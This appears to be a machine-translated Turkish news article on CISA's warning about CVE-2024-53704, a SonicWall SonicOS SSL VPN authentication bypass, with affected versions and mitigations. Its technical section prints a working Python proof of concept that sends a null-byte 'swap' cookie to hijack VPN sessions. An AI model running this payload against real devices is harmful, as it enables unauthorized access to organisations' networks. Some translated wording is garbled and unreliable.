ABD Siber Güvenlik ve Altyapı Güvenlik Ajansı (CISA), Sonicwall’un Sonicos’unda CVE-2024-53704 olarak izlenen kritik uzaktan kumanda (RCE) güvenlik açığının aktif olarak kullanılması konusunda acil bir uyarı yayınladı.
19 Şubat 2025’te CISA’nın bilinen sömürülen güvenlik açıkları (KEV) kataloğuna eklenen kusur, kimlik doğrulanmamış saldırganların SSL VPN oturumlarını ele geçirmesini ve kimlik doğrulama mekanizmalarını tamamen atlamasını sağlar.
Federal ajanslar, Bağlayıcı Operasyonel Direktif (BOD) 22-01 kapsamındaki kırılganlığı düzeltmek için 11 Mart 2025’e kadar.
Özel sektör kuruluşlarının, özellikle sağlık, finans ve kritik altyapıda, istismarın düşük karmaşıklığı ve gizli saldırı vektörü nedeniyle yamaya öncelik vermesi istenmektedir.
Kimlik doğrulama bypass’ın teknik analizi
Güvenlik açığı, Sonicos’un SSL VPN oturum çerezlerini ele alıyor.
Cyber Security News tarafından yapılan bir rapora göre, BishopFox’taki araştırmacılar, sistemin null bayt içeren baz kodlu çerezleri yanlış işlediğini ve saldırganların geçerli oturum tanımlayıcıları oluşturmasına izin verdiğini keşfetti.
Base64 dize olarak kodlanan ve takas çerezi ile enjekte edilen 32 boş karakterden oluşan kötü niyetli bir yük hazırlayarak, rakipler aktif VPN oturumlarını kimlik bilgileri olmadan ele geçirebilir.
Konsept kanıtı Python betiği, istismarın sadeliğini gösterir:
import base64, requests, urllib3, warnings
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
payload = base64.b64encode(b"\x00" * 32).decode()
resp = requests.get(
"https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
cookies={"swap": payload},
verify=False
)
print(resp.headers)
print(resp.text)Bu komut dosyası, kimlik doğrulama bypass’ı tetikleyen ve saldırganlara VPN tünellerine sınırsız erişim sağlayan kötü biçimlendirilmiş bir çerez oluşturur.
Kusurun CVSSV3 puanı 9.8 Gerekli ayrıcalıkların eksikliği ve sömürü kolaylığı ile birleştirilen kritik ciddiyetini yansıtır.
Etkilenen ürünler ve azaltma stratejileri
CVE-2024-53704 Aşağıdaki Sonicos sürümlerini etkiler:
- Sonica 7.1.x (7.1.1-7058’den önceki sürümler)
- Sonicos 7.1.2-7019
- Sonicos 8.0.0-8035
Sonicwall, anında dağıtım çağrısında bulunarak Gen5 -GEN7 güvenlik duvarları için ürün yazılımı güncellemeleri yayınladı. Hemen yama yapamayan kuruluşlar bu hafifletmeleri uygulamalıdır:
- SSL VPN erişimini kısıtlayın Güvenilir IP aralıklarına güvenlik duvarı kuralları aracılığıyla.
- İnternet’e dönük yönetim arayüzlerini devre dışı bırakın maruziyeti azaltmak için.
- Çok faktörlü kimlik doğrulamayı zorla (MFA) Tüm VPN kullanıcıları için, tek faktörlü kimlik bilgilerine güvenmeyi ortadan kaldırır.
Devlet kurumları da dahil olmak üzere 500.000’den fazla küresel müşteri ile Sonicwall’un yaygın olarak benimsenmesi güvenlik açığının risk profilini büyütüyor.
Federal ajanslar CISA’nın direktifi kapsamında zorunlu iyileştirme ile karşı karşıya, ancak özel sektör kuruluşları eşit derecede savunmasız kalıyor.
Susturanların geleneksel güvenlik uyarılarını tetiklemeden kalıcı erişim elde ettikleri için, istismarın kimlik doğrulamasını tespit etme yeteneği, olay tepkisini karmaşıklaştırır.
CISA’nın uyarısı, ağ cihazlarını hedefleyen saldırıların artan sofistike olmasının altını çiziyor.
Tehdit aktörleri yazılımdan donanım güvenlik açıklarına döndükçe, proaktif ürün yazılımı yönetimi ve katmanlı kimlik doğrulama savunmaları modern siber riskleri azaltmak için kritik öneme sahiptir.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here